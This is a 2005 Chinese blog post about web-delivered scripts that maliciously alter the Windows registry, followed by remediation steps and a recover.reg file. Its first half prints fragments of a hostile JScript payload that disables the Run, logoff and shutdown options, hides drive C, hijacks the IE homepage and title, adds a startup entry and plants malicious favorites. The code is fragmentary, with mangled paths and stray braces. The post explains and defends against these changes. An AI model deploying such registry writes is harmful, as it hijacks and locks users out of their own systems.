" id="b1img" alt="米课”N+1“思维建站-非官方免费技术支持,Wordpress/Zencart/Opencart建站、SEO" title="米课”N+1“思维建站-非官方免费技术支持,Wordpress/Zencart/Opencart建站、SEO">
  • " alt="米课”N+1“思维建站-非官方免费技术支持,Wordpress/Zencart/Opencart建站、SEO" title="米课”N+1“思维建站-非官方免费技术支持,Wordpress/Zencart/Opencart建站、SEO" />
  • " alt="Windows/Linux服务器运维技术支持 环境搭建、应用发布、服务器管理、虚拟化、云计算" title="Windows/Linux服务器运维技术支持 环境搭建、应用发布、服务器管理、虚拟化、云计算" />
  • " alt="高校/小型企业网络运维与建设免费技术支持,网络规划、网络优化、故障排除、网络管理" title="高校/小型企业网络运维与建设免费技术支持,网络规划、网络优化、故障排除、网络管理" />

恶意修改注册表及其应对方法

系统运维2005-04-14 itlogger阅读(466) 评论(0)
//以下是对操作系统相关注册表项值项的修改

//使系统没有“运行”项,以防止用户就不能通过注册表编辑器来修复设置。
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\ Explorer\NoRun”, 01, “REG_BINARY”);

//让操作系统无“关闭系统”选项
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\ Explorer\NoClose”, 01, “REG_BINARY”);

//让操作系统无“注销”选项
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\ Explorer\NoLogOff”, 01, “REG_BINARY”);
注:使受害者系统没有“注销”项
//让操作系统无逻辑驱动器C
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\ Explorer\NoDrives”, “00000004”, “REG_DWORD”);

//禁止运行所有的DOS应用程序;
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\ WinOldApp\ Disabled”,”REG_BINARY”) ;

//让操作系统无法切换至传统DOS的实模式下
Shl.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies WinOldApp\NoRealMode”,”REG_BINARY”) ;

// 让系统登录时显示一个登录窗口,以下是写入启动弹出对话框标题
Sh1.RegWrite ( “HKLM\Software\Microsoft\Windows\CurrentVersion\ Winlogon\Legal NoticeCaption”, “……..”);

// 写入启动弹出对话框内容
Sh1.RegWrite ( “HKLM\Software\Microsoft\Windows\CurrentVersion\ Winlogon\Legal NoticeText”, “……………”);

//以下是对IE相关注册表项值项的修改

// 设置浏览器默认主页
Sh1.RegWrite (”HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”, “…………..”);

// 修改启动中的输入法启动项
Sh1.RegWrite ( “HKLM\Software\Microsoft\Windows\CurrentVersion\ Run\internat.e xe”, “…………..”);

// 设置注册不可更改
Sh1.RegWrite ( “HKCU\Software\Microsoft\Windows\CurrentVersion\ Policies\WinOl dApp\NoRealMode”, “00000000”, “REG_DWORD”);

//修改浏览器的标题栏
Shl.RegWrite (”HKLM\Software\Microsoft\Internet Explorer\Main\Window Title”, “……………”);
Shl.RegWrite (”HKCU\Software\Microsoft\Internet Explorer\Main\Window Title”, “…………..”);

// 以下程序是将含恶意代码的网页添加至收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + “\Favorites”;
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName (WF) + “\Documents and Settings\
” + Net.UserName + “\Favorites”;
if(FSO.FolderExists( loc))
{
AddFavLnk(loc, “显示标题…..”, “URL……” );
}
}

//设置 cookie值
var expdate = new Date((new Date( )).getTime() + (1));
document.cookie=”Chg=general; expires=” + expdate.toGMTString( ) + “; path=/;”
}
}
catch(e)
{}
}
catch(e)
{}
}
//初始化函数,并每隔一秒执行修改程序
function init()
{
setTimeout(”f()”, 1000);
}
init();

因应对策:

当不小心遭了恶意代码时,首先需要做的是动修改注册表相关表项值:

一、手动修改

1、改正对默认 主页的修改:
在 HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain中的 “Start Page”和”Default_Page_URL”。

2、更改对Internet Explorer的标题栏的修改:
在 HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMain中右边的 窗口中修改字符串值“Window Title”为新标题的名字。

3、改正对地址栏 下的文字修改:
在 HKEY_CURRENT_USERSoftwareMicrosoftInterner ExplorerToolbar,在右边找到键值LinksFolderName,将其中的内容删去即可。

4、改正对Windows启动栏的修改:
这种情况适用于通过修改注册表项?quot;Start Page”和 “Default_Page_URL”仍不能生效的情况,可试着依次打开如下主键: HKEY_LOCAL_MACHINE/Microsoft/Windows/CurrentVersion/run修改右栏里的“qwe”的键值,删掉表项值,重新启动计算机。

5、改正在Internet Exploer中点击右键中出现非法站点的链接:
在 HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMenuExt中删除非法链接的该键值即可。

6、清除浏览器中地址栏中无用的地址:
在 HEKY_CURRENT_USERSoftwareMicrosoftInternet ExplorerTypeURLs中删除无用的键值即可。
二、应用工具软件
下载《反修改精灵》软件:
该软件能有效地防止IE修改,可到天极网mydown下载站下载。

三、备份与命令恢复

1:对于Win9x用户,可在机器启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的正常注册表。
2:对于Win2000用户,把以下内容copy下来,存为recover.reg文件,选带命令行的安全模式,用命令regedit recover.reg导入,然后重启机器:
recover.reg文件内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorer]
“NoDriveTypeAutoRun”=dword:00000095
“NoRun”=hex:
“NoLogOff”=hex:
“NoDrives”=dword:00000000
“RestrictRun”=dword:00000000

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesSystem]
“DisableRegistryTools”=dword:00000000

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesSystem]
“DisableRegistryTools”=dword:00000000

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesWinOldApp]
“Disabled”=dword:00000000

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesWinOldApp]
“NoRealMode”=dword:00000000

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Winlogon]
“LegalNoticeCaption”=””
“LegalNoticeText”=””

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain]
“Window Title”=””

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
“Window Title”=””

转载请注明 :IT樵客
文章地址:http://www.itlogger.com/system/44.html
标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注